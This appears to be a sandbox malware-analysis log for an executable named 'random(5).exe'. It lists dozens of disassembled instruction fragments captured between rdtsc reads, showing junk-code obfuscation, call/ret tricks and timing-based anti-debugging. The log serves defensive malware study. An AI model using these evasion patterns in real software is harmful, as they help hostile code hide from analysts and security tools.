    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173564B second address: 1735651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1735651 second address: 1735655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1735655 second address: 1735673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89C2h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1735673 second address: 173567C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173567C second address: 17356AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007F519CFC89CCh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17356AC second address: 17356C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F519CD4C378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17357B5 second address: 17357BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17357BA second address: 17357C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17359F2 second address: 17359FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1735BFC second address: 1735C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F519CD4C376h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17361AF second address: 17361B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17361B5 second address: 17361BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17361BB second address: 17361BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173630D second address: 173631B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F519CD4C376h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173897E second address: 173898E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173898E second address: 1738992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1738992 second address: 1738996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1739B83 second address: 1739BB7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F519CD4C37Ch 0x00000013 jmp 00007F519CD4C386h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173BC3F second address: 173BC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173BC43 second address: 173BCD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F519CD4C378h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1C90h], esi 0x0000002c mov esi, dword ptr [ebp+122D3963h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F519CD4C378h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e add esi, 2E425741h 0x00000054 jmp 00007F519CD4C384h 0x00000059 push ecx 0x0000005a mov di, 44D9h 0x0000005e pop esi 0x0000005f push 00000000h 0x00000061 mov di, si 0x00000064 push eax 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 push esi 0x00000069 pop esi 0x0000006a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173AF4F second address: 173AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F519CFC89BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1743C89 second address: 1743C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1743C94 second address: 1743CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89BEh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1744B71 second address: 1744BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F519CD4C39Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F519CD4C384h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173EEE7 second address: 173EEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F519CFC89B6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173FFBA second address: 173FFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1744BA8 second address: 1744C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F519CFC89B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push edi 0x00000025 jbe 00007F519CFC89C6h 0x0000002b jmp 00007F519CFC89C0h 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 call 00007F519CFC89BDh 0x00000038 jl 00007F519CFC89BCh 0x0000003e mov edi, dword ptr [ebp+122D39ABh] 0x00000044 pop ebx 0x00000045 push 00000000h 0x00000047 mov di, B9F5h 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 pop edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1741ECA second address: 1741ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173EEF1 second address: 173EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1743DD3 second address: 1743E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1247EBADh], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+1245E71Ah], eax 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F519CD4C378h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 ja 00007F519CD4C37Bh 0x00000046 mov eax, dword ptr [ebp+122D07B1h] 0x0000004c xor dword ptr [ebp+122D1972h], eax 0x00000052 push FFFFFFFFh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007F519CD4C37Ch 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1744C19 second address: 1744C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1741ECE second address: 1741ED4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1743E55 second address: 1743E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1741ED4 second address: 1741EDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1745B99 second address: 1745BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746B68 second address: 1746B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746B6C second address: 1746BE9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F519CFC89B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F519CFC89C1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F519CFC89B8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a mov bx, 14F8h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jc 00007F519CFC89C3h 0x00000057 jmp 00007F519CFC89BDh 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746BE9 second address: 1746BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F519CD4C376h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1747AF1 second address: 1747B4B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b jl 00007F519CFC89B6h 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 nop 0x00000014 jnp 00007F519CFC89BCh 0x0000001a xor edi, 135C61F0h 0x00000020 push 00000000h 0x00000022 jne 00007F519CFC89BCh 0x00000028 push 00000000h 0x0000002a and bx, 747Fh 0x0000002f add dword ptr [ebp+122D1B7Eh], ecx 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jp 00007F519CFC89C6h 0x0000003e jmp 00007F519CFC89C0h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746D81 second address: 1746D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1747CF3 second address: 1747CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749D36 second address: 1749DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F519CD4C37Eh 0x0000000c nop 0x0000000d push esi 0x0000000e mov edi, 7C94D246h 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F519CD4C378h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub edi, 183B8A94h 0x0000003b sub dword ptr [ebp+1247F3E8h], edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, dword ptr [ebp+122D3A1Fh] 0x0000004e mov eax, dword ptr [ebp+122D0921h] 0x00000054 mov dword ptr [ebp+12451724h], ebx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 8240h 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749DAA second address: 1749DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AE45 second address: 174AE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749DAF second address: 1749DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AEE9 second address: 174AEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AEED second address: 174AEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174CEAF second address: 174CEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174FC69 second address: 174FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F519CFC89C6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1755745 second address: 175576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F519CD4C376h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CD4C386h 0x00000011 jg 00007F519CD4C376h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1758E1D second address: 1758E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F519CFC89BEh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1759123 second address: 1759129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DC81 second address: 175DC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DD62 second address: 175DD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F519CD4C37Dh 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F519CD4C37Fh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DD8C second address: 175DD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17660AD second address: 17660B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1764C4C second address: 1764C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176553F second address: 176554B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F519CD4C376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17656EA second address: 17656F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17656F8 second address: 1765723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F519CD4C37Eh 0x0000000f jnp 00007F519CD4C376h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F519CD4C376h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765723 second address: 1765729 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765729 second address: 176573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F519CD4C382h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658D5 second address: 17658F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89C7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658F0 second address: 17658FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F519CD4C376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658FA second address: 1765938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F519CFC89C1h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BEh 0x00000018 jmp 00007F519CFC89BDh 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765A8E second address: 1765A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765A94 second address: 1765ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F519CFC89B6h 0x0000000a jmp 00007F519CFC89C6h 0x0000000f popad 0x00000010 jo 00007F519CFC89BCh 0x00000016 jl 00007F519CFC89B6h 0x0000001c pushad 0x0000001d jns 00007F519CFC89B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765ACA second address: 1765AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765C26 second address: 1765C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765C2C second address: 1765C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765D8D second address: 1765DA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F519CFC89BEh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765EF3 second address: 1765EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F519CD4C376h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765EFD second address: 1765F41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F519CFC89C3h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 jc 00007F519CFC89C4h 0x00000017 jmp 00007F519CFC89BCh 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 jmp 00007F519CFC89BDh 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AA8E second address: 176AA9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F519CD4C376h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AEC9 second address: 176AED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AFF7 second address: 176AFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AFFB second address: 176B007 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B007 second address: 176B013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F519CD4C376h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B3D3 second address: 176B3EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F519CFC89BCh 0x00000010 je 00007F519CFC89B6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9B2 second address: 176B9BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
